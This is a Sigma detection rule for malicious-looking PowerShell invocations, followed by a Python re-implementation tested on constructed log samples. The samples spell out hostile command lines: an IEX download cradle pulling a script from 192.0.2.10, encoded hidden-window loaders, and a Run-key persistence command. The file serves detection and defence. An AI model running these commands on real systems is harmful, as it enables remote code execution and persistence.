Suspicious PowerShell Invocations - Specific - PowerShell Module

Detects PowerShell invocations whose command-line parameters are characteristic of malicious use (hidden window, no profile, encoded or Base64-decoded payloads, download cradles, Run-key persistence), as recorded in the ContextInfo field of PowerShell Module logging events (Event ID 4103).

Sigma rule

title: Suspicious PowerShell Invocations - Specific - PowerShell Module
id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090
related:
    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
      type: obsolete
    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71
      type: similar
    - id: 536e2947-3729-478c-9903-745aaffe60d2
      type: similar
status: test
description: Detects suspicious PowerShell invocation command parameters
references:
    - Internal Research
    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
date: 2017-03-05
modified: 2025-02-17
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection_convert_b64:
        ContextInfo|contains|all:
            - '-nop'
            - ' -w '
            - 'hidden'
            - ' -c '
            - '[Convert]::FromBase64String'
    selection_iex:
        ContextInfo|contains|all:
            - ' -w '
            - 'hidden'
            - '-noni'
            - '-nop'
            - ' -c '
            - 'iex'
            - 'New-Object'
    selection_enc:
        ContextInfo|contains|all:
            - ' -w '
            - 'hidden'
            - '-ep'
            - 'bypass'
            - '-Enc'
    selection_reg:
        ContextInfo|contains|all:
            - 'powershell'
            - 'reg'
            - 'add'
        ContextInfo|contains:
            - '\software\microsoft\windows\currentversion\run'
            - '\software\wow6432node\microsoft\windows\currentversion\run'
            - '\software\microsoft\windows\currentversion\policies\explorer\run'
    selection_webclient:
        ContextInfo|contains|all:
            - 'bypass'
            - '-noprofile'
            - '-windowstyle'
            - 'hidden'
            - 'new-object'
            - 'system.net.webclient'
            - '.download'
    selection_iex_webclient:
        ContextInfo|contains|all:
            - 'iex'
            - 'New-Object'
            - 'Net.WebClient'
            - '.Download'
    filter_chocolatey:
        ContextInfo|contains:
            - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
            - 'Write-ChocolateyWarning'
    condition: 1 of selection_* and not 1 of filter_*
falsepositives:
    - Unknown
level: high
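The following Python is an added example, not part of the rule or of the Sigma project: it transcribes the detection block above, applies the condition `1 of selection_* and not 1 of filter_*` with Sigma's default case-insensitive `contains` semantics, and runs it over constructed Event ID 4103 ContextInfo values. The ContextInfo layout, the Host Application command lines, the payload strings and the 192.0.2.10 address are all made up for the example; they are not captured events.

```python
"""Re-implementation of the rule's detection block over constructed
PowerShell Module (Event ID 4103) ContextInfo samples.  Example code, not
the rule itself or a Sigma backend; `contains` is evaluated
case-insensitively, as Sigma does by default."""

# Transcription of the rule's detection block.  Each selection is a dict of
# modifier -> needles; several keys inside one selection are ANDed, as in Sigma.
SELECTIONS = {
    "selection_convert_b64": {
        "all": ["-nop", " -w ", "hidden", " -c ", "[Convert]::FromBase64String"]},
    "selection_iex": {
        "all": [" -w ", "hidden", "-noni", "-nop", " -c ", "iex", "New-Object"]},
    "selection_enc": {
        "all": [" -w ", "hidden", "-ep", "bypass", "-Enc"]},
    "selection_reg": {
        "all": ["powershell", "reg", "add"],
        "any": [r"\software\microsoft\windows\currentversion\run",
                r"\software\wow6432node\microsoft\windows\currentversion\run",
                r"\software\microsoft\windows\currentversion\policies\explorer\run"]},
    "selection_webclient": {
        "all": ["bypass", "-noprofile", "-windowstyle", "hidden", "new-object",
                "system.net.webclient", ".download"]},
    "selection_iex_webclient": {
        "all": ["iex", "New-Object", "Net.WebClient", ".Download"]},
}
FILTERS = {
    "filter_chocolatey": {
        "any": ["(New-Object System.Net.WebClient).DownloadString("
                "'https://community.chocolatey.org/install.ps1",
                "Write-ChocolateyWarning"]},
}


def _matches(value_lc, sel):
    """Evaluate one selection map against an already lower-cased field value."""
    if "all" in sel and not all(n.lower() in value_lc for n in sel["all"]):
        return False
    if "any" in sel and not any(n.lower() in value_lc for n in sel["any"]):
        return False
    return True


def evaluate(context_info):
    """Apply `1 of selection_* and not 1 of filter_*` to one ContextInfo value.

    Returns the names of the selections that matched, or [] when the rule
    does not fire (nothing matched, or a filter suppressed the event)."""
    v = context_info.lower()
    if any(_matches(v, f) for f in FILTERS.values()):
        return []
    return [name for name, sel in SELECTIONS.items() if _matches(v, sel)]


def _ctx(host_application):
    """Wrap a Host Application line in a constructed 4103-style ContextInfo
    block.  Real events carry more fields; only the layout is imitated."""
    return ("Severity = Informational\r\n"
            "Host Name = ConsoleHost\r\n"
            f"Host Application = {host_application}\r\n"
            "Engine Version = 5.1.19041.1\r\n")


# Constructed sample events.  Payloads and the 192.0.2.10 address are made up
# (192.0.2.0/24 is a documentation range).
SAMPLES = {
    "b64_loader": _ctx("powershell.exe -nop -w hidden -c "
                       "\"[Convert]::FromBase64String('SQBFAFgA')\""),
    "encoded_cmd": _ctx("powershell.exe -w hidden -ep bypass -Enc SQBFAFgAIAAoAA=="),
    "run_key": _ctx("powershell.exe -c \"reg add "
                    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
                    "/v Updater /t REG_SZ /d C:\\Users\\Public\\u.exe\""),
    "download_cradle": _ctx("powershell.exe -c \"IEX (New-Object Net.WebClient)"
                            ".DownloadString('http://192.0.2.10/a.ps1')\""),
    "chocolatey_install": _ctx("powershell.exe -c \"Set-ExecutionPolicy Bypass "
                               "-Scope Process -Force; iex ((New-Object "
                               "System.Net.WebClient).DownloadString("
                               "'https://community.chocolatey.org/install.ps1'))\""),
    # Same loader as b64_loader, but with the long -WindowStyle form instead
    # of the ' -w ' alias the selections key on.
    "long_alias_b64": _ctx("powershell.exe -nop -WindowStyle hidden -c "
                           "\"[Convert]::FromBase64String('SQBFAFgA')\""),
    "benign_inventory": _ctx("powershell.exe -c \"Get-ChildItem C:\\Windows "
                             "-Recurse | Measure-Object\""),
}


def run_rule(samples=SAMPLES):
    """Evaluate every sample; returns {label: [matched selection names]}."""
    return {label: evaluate(ctx) for label, ctx in samples.items()}


if __name__ == "__main__":
    for label, hits in run_rule().items():
        print(f"{label:20} -> {hits or 'no match'}")
```

Running the block, the four malicious samples each fire exactly one selection (`selection_convert_b64`, `selection_enc`, `selection_reg`, `selection_iex_webclient`), the Chocolatey bootstrap is suppressed by `filter_chocolatey` even though `selection_iex_webclient` would otherwise match it, and the inventory command does not match. The `long_alias_b64` sample is the caveat worth checking when tuning: the `selection_convert_b64`, `selection_iex` and `selection_enc` patterns anchor on the literal `' -w '` alias, so the same loader written with `-WindowStyle hidden` passes this rule untouched (the related rules listed under `related:` are the place to look for complementary coverage, not something this example asserts). Because matching is substring-based and case-insensitive, short needles such as `reg`, `add` and `iex` are also satisfied by unrelated text in ContextInfo, which is why each selection requires the full set of its needles rather than any one of them.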
